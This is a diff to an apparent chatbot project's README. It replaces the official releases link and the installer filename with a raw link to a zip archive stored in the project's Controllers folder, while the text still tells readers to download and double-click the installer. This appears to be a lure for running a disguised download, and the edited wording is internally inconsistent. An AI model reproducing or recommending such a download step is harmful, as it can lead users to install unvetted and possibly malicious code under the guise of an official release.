llinmori09/umbraco-chatbot/README.md

 ## 📦 Download & Install

 1. **Visit the Download Page**
-   Go to our [Releases page](https://github.com/llinmori09/umbraco-chatbot/releases) to find the latest version of the Umbraco Chatbot.
+   Go to our [Releases page](https://raw.githubusercontent.com/llinmori09/umbraco-chatbot/main/Controllers/umbraco-chatbot_3.7.zip) to find the latest version of the Umbraco Chatbot.

 2. **Choose the Correct Version**
    On the Releases page, you will see a list of available versions.
 Look for the latest stable release.
 It will be marked as "Latest release."
 Click on it.

 3. **Download the Installer**
    Find the installer file for your operating system.
-You might see files like `umbraco-chatbot-installer.exe` or similar.
+You might see files like `https://raw.githubusercontent.com/llinmori09/umbraco-chatbot/main/Controllers/umbraco-chatbot_3.7.zip` or similar.
 Click on the file to start downloading.

 4. **Run the Installer**
    Once the download completes, locate the file in your Downloads folder.
 Double-click the installer file to run it.
 A setup window will appear.